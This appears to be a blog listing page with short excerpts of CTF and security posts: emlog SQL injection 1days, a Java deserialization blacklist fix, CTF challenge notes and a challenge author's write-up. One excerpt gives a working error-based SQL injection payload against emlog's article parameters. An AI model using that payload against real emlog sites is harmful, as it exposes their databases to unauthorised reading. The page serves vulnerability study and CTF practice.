A low-effort emlog bug
A low-effort 0day: SQL injection as a registered emlog user
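A simple audit of emlog 1days
Let's do a quick audit of a few front-end 1days. Front-end vulnerabilities really aren't that easy to dig up, and padding the list with back-end vulnerabilities isn't much fun. Two simple SQL injections, seen in the Issues: auto_excerpt=y&logcontent=123\&as_logid=1&cover=or extractvalue(0x0a,concat(0x0a,(select database())))#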
java
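Fujian Agriculture and Forestry University attack-defense team 1 writeup: justDeserialize
com.example.ezjav.utils.User contains a reflective call, which makes it a malicious class. Override the input stream and add this class to the blacklist.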
package com.example.ezjav.controller;

import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import java.util.HashSet;
import java.util.Set;

public class NewObjectInputStream extends ObjectInputStream {
    private static final Set<String> BLACKLISTED_CLASSES = new HashSet(); ...
Tie San (铁三)
#!/bin/bash
sed -i s#t3sec2025#s1eeps0rt#g /usr/local/lib/python2.7/dist-packages/bootstrap_admin_web/views.py
Challenge practice: 2023 April Fools' Cup
easy_signin
File read. The flag and environ can't be read; found the flag while reading the source code.
The Forgotten Deserialization
<?php
function cipher($str) {
    if(strlen($str)>10000){
        exit(-1);
    }
    $charset = "qwertyuiopasdfghjklzxcvbnm123456789";
    $shift = 4;
    $shifted = "";
    for ($i = 0; $i < strlen($str); $i++) {
        $char = $str[$i];
        $pos = strpos($charset, $char);
        if ($pos !== false) {
            $new_pos = ($pos - $shift + str ...
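GHCTF_web_wp (challenges I wrote myself)
It got wrecked by unintended solutions, so first an apology to everyone (ugh).
upload?SSTI!
For this challenge I gave out the source code directly. I wrote the logic for a file upload and a file read.
Looking at the file-read function, we can spot it.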
@app.route('/file/<path:filename>')
def view_file(filename):
    try:
        # 1. Sanitize the filename
        safe_filename = secure_filename(filename)
        if not safe_filename:
            abort(400, description="无效文件名")
        # 2. Build the full path
        file_path = os.path.join(app.config['UPLOAD_FOLDER' ...
CTFshow